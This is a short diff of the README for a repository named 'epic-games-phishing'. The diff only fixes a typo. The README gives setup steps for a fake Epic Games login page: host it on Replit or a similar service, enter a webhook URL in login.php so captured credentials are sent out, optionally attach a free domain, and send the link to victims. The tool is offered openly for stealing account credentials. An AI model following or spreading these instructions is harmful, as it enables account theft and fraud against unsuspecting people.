dimondkingYT717/epic-games-phishing/README.md

 2. Upload it on a host like Replit, Glitch, Vercel (Im using Replit)
 4. Go in `login.php`, and put your webhook url.
 (You can enable ping too)
 5. Then Your program is ready !
 (if you want to setup a free domain to your website, i recommend to use [Freenom](https://www.freenom.com).
-You can setup your domain by following a youtube tutorial its ezy dont worry)
+You can setup your domain by following a youtube tutorial its easy dont worry)

 # ❓ - How do its work ?
 Copy the link and send it to someone idk 🤷‍♂️.